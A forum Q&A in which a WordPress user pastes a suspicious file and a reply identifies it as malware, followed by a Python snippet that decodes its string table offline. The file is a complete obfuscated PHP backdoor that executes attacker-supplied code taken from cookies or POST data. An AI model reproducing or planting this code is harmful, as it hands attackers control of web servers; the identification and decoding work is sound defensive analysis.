I'm new to WordPress and do not fully understand which files of WordPress are its own and which are not. There's a file in the root folder by the name b5tzvh8n.php with the following content:
<?php
if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw PGhlYWQ Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE Rm9yYmlkZGVuPC9oMT4KPHA WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
?>
<?php
function z1($f2){$b3 = "l'a*1 <g?.mndhHptk;sv359e#xErF4ifou2(bIy-_6/)@L8c" ;$z5='';foreach($f2 as $v4){$z5.=$b3[$v4];}return $z5;}$p6 = Array();$p6[] = z1(Array(47,42,4,47,24,21,4,22,40,2,47,22,2,40,30,23,22,37,40,37,22,47,23,40,47,47,37,35,12,32,22,4,4,2,2,22));$p6[] = z1(Array(8,15,13,15,5,45,34,11,0,31,11,17,36,41,41,29,38,46,27,41,41,44,18,5));$p6[] = z1(Array(9,10,33,12,34,0,24));$p6[] = z1(Array(14,3));$p6[] = z1(Array(9,43));$p6[] = z1(Array(25));$p6[] = z1(Array(6));$p6[] = z1(Array(32,31,0,24,41,15,34,16,41,48,33,11,16,24,11,16,19));$p6[] = z1(Array(2,28,28,2,39,41,10,24,28,7,24));$p6[] = z1(Array(19,16,28,41,28,24,15,24,2,16));$p6[] = z1(Array(24,26,15,0,33,12,24));$p6[] = z1(Array(19,34,37,19,16,28));$p6[] = z1(Array(34,11,0,31,11,17));$p6[] = z1(Array(19,16,28,0,24,11));$p6[] = z1(Array(15,2,48,17));$p6[] = z1(Array(10,12,22));foreach ($p6[8]($_COOKIE, $_POST) as $m14 => $e11){function r8($p6, $m14, $y10){return $p6[11]($p6[9]($m14 . $p6[0], ($y10 / $p6[13]($m14)) 1), 0, $y10);}function x7($p6, $u12){return @$p6[14]($p6[3], $u12);}function y9($p6, $u12){if (isset($u12[2])) {$s13 = $p6[4] . $p6[15]($p6[0]) . $p6[2];@$p6[7]($s13, $p6[6] . $p6[1] . $u12[1]($u12[2]));@include($s13);@$p6[12]($s13);exit();}}$e11 = x7($p6, $e11);y9($p6, $p6[10]($p6[5], $e11 ^ r8($p6, $m14, $p6[13]($e11))));}
What is the purpose of this file?
CodePudding user response:
This is malware; you should install a plugin like Wordfence. It will allow you to find the infected files and hopefully also the point of entry. You should be aware that this often happens from nulled software packages.
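To see what the obfuscated string table in the question's file holds without running the PHP, the index arrays can be decoded offline by plain table lookup. This is an added example, not part of the original question or answer; the regular expressions and the `SUSPICIOUS` triage list are assumptions of this sketch.

```python
import re

# Excerpt copied from the file in the question (lookup alphabet and index arrays).
# It is treated as inert text: nothing here executes PHP.
SAMPLE = r'''$b3 = "l'a*1 <g?.mndhHptk;sv359e#xErF4ifou2(bIy-_6/)@L8c" ;
$p6[] = z1(Array(47,42,4,47,24,21,4,22,40,2,47,22,2,40,30,23,22,37,40,37,22,47,23,40,47,47,37,35,12,32,22,4,4,2,2,22));
$p6[] = z1(Array(8,15,13,15,5,45,34,11,0,31,11,17,36,41,41,29,38,46,27,41,41,44,18,5));
$p6[] = z1(Array(9,10,33,12,34,0,24));$p6[] = z1(Array(14,3));$p6[] = z1(Array(9,43));$p6[] = z1(Array(25));$p6[] = z1(Array(6));
$p6[] = z1(Array(32,31,0,24,41,15,34,16,41,48,33,11,16,24,11,16,19));$p6[] = z1(Array(2,28,28,2,39,41,10,24,28,7,24));
$p6[] = z1(Array(19,16,28,41,28,24,15,24,2,16));$p6[] = z1(Array(24,26,15,0,33,12,24));$p6[] = z1(Array(19,34,37,19,16,28));
$p6[] = z1(Array(34,11,0,31,11,17));$p6[] = z1(Array(19,16,28,0,24,11));$p6[] = z1(Array(15,2,48,17));$p6[] = z1(Array(10,12,22));
'''

# Assumed triage list for this sketch: names that write, delete or unpack data.
SUSPICIOUS = {"file_put_contents", "unlink", "pack"}

def decode_table(src):
    """Rebuild the strings that z1() would return, by table lookup only."""
    alphabet = re.search(r'\$\w+\s*=\s*"([^"]+)"', src).group(1)
    table = []
    for m in re.finditer(r'\w+\(Array\(([\d,\s]+)\)\)', src):
        idx = [int(n) for n in m.group(1).split(",")]
        if any(i >= len(alphabet) for i in idx):
            raise ValueError("index outside alphabet: damaged or wrong sample")
        table.append("".join(alphabet[i] for i in idx))
    return table

def flagged(table):
    """Return {position: name} for decoded entries on the triage list."""
    return {i: s for i, s in enumerate(table) if s in SUSPICIOUS}

if __name__ == "__main__":
    for i, s in enumerate(decode_table(SAMPLE)):
        mark = "  <-- review" if s in SUSPICIOUS else ""
        print(f"p6[{i}] = {s!r}{mark}")
```

The decoded entries are the function names the file later calls through `$p6[...]`, which is why a plain text search of the file for those names finds nothing.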